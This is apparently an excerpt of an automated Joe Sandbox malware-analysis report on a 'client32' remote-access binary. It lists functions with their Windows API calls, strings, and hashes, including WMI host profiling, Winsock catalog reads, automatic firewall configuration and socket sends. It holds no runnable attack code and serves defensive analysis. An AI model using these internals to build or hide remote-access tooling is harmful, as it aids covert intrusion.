                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                                                                                • Opcode ID: e40204e166f176785cb669edad9a2eeb4e676a2913bfac37801215a9a73cff23
                                                                                                                                                                                • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                                                                                                • Opcode Fuzzy Hash: e40204e166f176785cb669edad9a2eeb4e676a2913bfac37801215a9a73cff23
                                                                                                                                                                                • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                                                                                                Function 11146010 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                                                                  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion
                                                                                                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                • API String ID: 925726728-545709139
                                                                                                                                                                                • Opcode ID: 09436c264f2e67ef7d047643a4a3899dfe89b3c82c4e5d3dd6e28598ac4f31c9
                                                                                                                                                                                • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                                                                                • Opcode Fuzzy Hash: 09436c264f2e67ef7d047643a4a3899dfe89b3c82c4e5d3dd6e28598ac4f31c9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                                                                                Function 6C616940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616950
                                                                                                                                                                                  • Part of subcall function 6C617BE0: _memset.LIBCMT ref: 6C617BFF
                                                                                                                                                                                  • Part of subcall function 6C617BE0: _strncpy.LIBCMT ref: 6C617C0B
                                                                                                                                                                                  • Part of subcall function 6C60A4E0: EnterCriticalSection.KERNEL32(6C64B898,00000000,?,?,?,6C60DA7F,?,00000000), ref: 6C60A503
                                                                                                                                                                                  • Part of subcall function 6C60A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C60A568
                                                                                                                                                                                  • Part of subcall function 6C60A4E0: Sleep.KERNEL32(00000000,?,6C60DA7F,?,00000000), ref: 6C60A581
                                                                                                                                                                                  • Part of subcall function 6C60A4E0: LeaveCriticalSection.KERNEL32(6C64B898,00000000), ref: 6C60A5B3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                                                                • String ID: 1.2$Blal$Channel$Client$Publish %d pending services
                                                                                                                                                                                • API String ID: 1112461860-1513480084
                                                                                                                                                                                • Opcode ID: 0316471f034437c7dd64568c5d9b9697e834c26a86179df9352d03feea8c39cb
                                                                                                                                                                                • Instruction ID: 839b1eb6a24a6d2999cb7c0183aefe19625999a8573d343a6284bfd4413594f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 0316471f034437c7dd64568c5d9b9697e834c26a86179df9352d03feea8c39cb
                                                                                                                                                                                • Instruction Fuzzy Hash: BE51AF75B08205ABDB10FA6ED98079A37B5EB0630EF24C628D852D3F81DB31D549CB5D
                                                                                                                                                                                Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 1114580D
                                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,11110200), ref: 1114584E
                                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                                • API String ID: 3494822531-1878648853
                                                                                                                                                                                • Opcode ID: 049b9b20864a6c2d830f410e0cd67a73e4151100085c5408f8f1ae3d7cec1718
                                                                                                                                                                                • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 049b9b20864a6c2d830f410e0cd67a73e4151100085c5408f8f1ae3d7cec1718
                                                                                                                                                                                • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                                                                                Function 110155C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 1101567A
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                                                                                Strings
                                                                                                                                                                                • PackedCatalogItem, xrefs: 110156E2
                                                                                                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                                                                                • %012d, xrefs: 11015674
                                                                                                                                                                                • NSLSP, xrefs: 11015708
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValuewsprintf
                                                                                                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                                • API String ID: 2072284396-1346142259
                                                                                                                                                                                • Opcode ID: 12245fa9ab10dbf56fd73685e61d57286da081fdbead7d80486de31f12da88b1
                                                                                                                                                                                • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                                                                                • Opcode Fuzzy Hash: 12245fa9ab10dbf56fd73685e61d57286da081fdbead7d80486de31f12da88b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                                                                                Function 11108120 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 1111029E
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1118AA56,000000FF), ref: 111081F3
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 11108242
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 111082A4
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 111082B9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$CreateEventException@8Throwstd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                                • API String ID: 680807762-2390547818
                                                                                                                                                                                • Opcode ID: ce57a6bde36480b49a607dcfb9f8cb8076556b22b1a01f171a57def2ceb94733
                                                                                                                                                                                • Instruction ID: 042cecf077ebf130913fcab0b51fe52cd67b76f6946a2fff0d23d1735bc73c30
                                                                                                                                                                                • Opcode Fuzzy Hash: ce57a6bde36480b49a607dcfb9f8cb8076556b22b1a01f171a57def2ceb94733
                                                                                                                                                                                • Instruction Fuzzy Hash: E941F1B5D09B449EC761CF6A8980BDAFBE8EFA5604F00491EE5AE93210D7787600CF65
                                                                                                                                                                                Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101792C
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                                                                • CoUninitialize.COMBASE ref: 110179C0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                                • API String ID: 2407233060-578995875
                                                                                                                                                                                • Opcode ID: 706135c50dd2bdc4b27cbaf30463934b0a8275def89b9e951830e87fb59f3d33
                                                                                                                                                                                • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                                                                                                • Opcode Fuzzy Hash: 706135c50dd2bdc4b27cbaf30463934b0a8275def89b9e951830e87fb59f3d33
                                                                                                                                                                                • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                                                                                                Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017842
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                                                                • CoUninitialize.COMBASE ref: 110178D0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                                • API String ID: 2407233060-2037925671
                                                                                                                                                                                • Opcode ID: 447eeddf3cd7a8776ee3699a572de464482b7f9eff084ed1533d7d07bff5a608
                                                                                                                                                                                • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                                                                                                • Opcode Fuzzy Hash: 447eeddf3cd7a8776ee3699a572de464482b7f9eff084ed1533d7d07bff5a608
                                                                                                                                                                                • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                                                                                                Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • DoICFConfig() OK, xrefs: 111396D6
                                                                                                                                                                                • AutoICFConfig, xrefs: 11139650
                                                                                                                                                                                • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                                                                                                                • Client, xrefs: 11139655
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                                                • API String ID: 536389180-1512301160
                                                                                                                                                                                • Opcode ID: eb44d847190d6a833025ef8c7baed3cc7fc27de222c6ae2f63559e84332bbfcf
                                                                                                                                                                                • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                                                                                                                • Opcode Fuzzy Hash: eb44d847190d6a833025ef8c7baed3cc7fc27de222c6ae2f63559e84332bbfcf
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                                                                                                Function 6C609C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • send.WSOCK32(?,?,?,00000000), ref: 6C609C93
                                                                                                                                                                                • timeGetTime.WINMM(?,?,?,00000000), ref: 6C609CD0
                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 6C609CDE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6C609D4F
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 6C609D72
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
